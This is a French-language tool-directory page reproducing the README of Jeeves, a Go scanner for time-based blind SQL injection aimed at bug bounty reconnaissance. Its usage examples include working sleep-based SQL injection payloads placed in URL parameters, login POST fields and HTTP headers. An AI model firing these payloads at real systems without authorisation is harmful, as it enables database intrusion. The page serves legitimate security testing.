Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Jeeves — Outil de détection d'injection SQL aveugle basée sur le temps pour la reconnaissance et les programmes de bug bounty. Accepte des URLs uniques ou des listes, prend en charge les en-têtes personnalisés, le proxy et les données POST pour le scan automatisé des vulnérabilités. | Kitploit
Outils/GitHubGitHub/ferreiraklet/jeeves
Scanners de VulnérabilitésSécurité WebTests d'Intrusion
GitHubferreiraklet/jeeves

Jeeves

Outil de détection d'injection SQL aveugle basée sur le temps pour la reconnaissance et les programmes de bug bounty. Accepte des URLs uniques ou des listes, prend en charge les en-têtes personnalisés, le proxy et les données POST pour le scan automatisé des vulnérabilités.

Voir le dépôt
2155044il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

made-with-Go

Jeeves


Utilisation • Installation

Jeeves est conçu pour rechercher les injections SQL aveugles basées sur le temps lors de la reconnaissance.

Sommaire :

  • Installation
  • Utilisation
    • Ajout d'en-têtes
    • Utilisation d'un proxy
    • Requête POST
    • Autres façons d'utiliser

- Installation & Prérequis :

Installation de Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

OU

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Utilisation & Explication :

Lors de votre processus de reconnaissance, vous pouvez trouver des points d'accès qui pourraient être vulnérables aux injections SQL, Ex : https://redacted.com/index.php?id=1

URLs uniques

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

Dans --payload-time, vous devez utiliser le temps mentionné dans la payload


Depuis une liste

cat targets | jeeves --payload-time 5

Ajout d'en-têtes

Attention à la syntaxe ! Doit être identique =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Utilisation d'un proxy

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + En-têtes =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Requête POST

Envoi de données via une requête POST ( formulaires de connexion, etc. )

Attention à la syntaxe ! Doit être identique ! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Autres façons d'utiliser

Vous pouvez utiliser Jeeves avec d'autres outils, comme gau, gauplus, waybackurls, qsreplace et bhedak, pour maîtriser sa puissance.


Command line flags:

root@kitploit:~
 Usage:
 -t, --payload-time,  The time from payload
 -p, --proxy          Send traffic to a proxy
 -c                   Set Concurrency, Default 25
 -H, --headers        Custom Headers
 -d, --data           Sending Post request with data
 -h                   Show This Help Message

Utilisation avec une wordlist de payloads SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Test dans les en-têtes

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

Remarque :

  • Ne suit pas les redirections. Si le code de statut est différent de 200, il retourne « Need Manual Analysis ».
  • Jeeves ne fait pas de probing HTTP, il n'est pas capable d'envoyer des requêtes vers des URLs qui ne contiennent pas de protocole ( http://, https:// )

Ce projet est uniquement à des fins éducatives et de bug bounty ! Je ne soutiens aucune activité illégale !

Si une erreur se produit dans le programme, contactez-moi immédiatement.

Veuillez également consulter ces outils =>

Nilo - Vérifie si l'URL a un statut 200

SQLMAP

Blisqy Injection SQL temporelle basée sur les en-têtes

Télécharger l’outil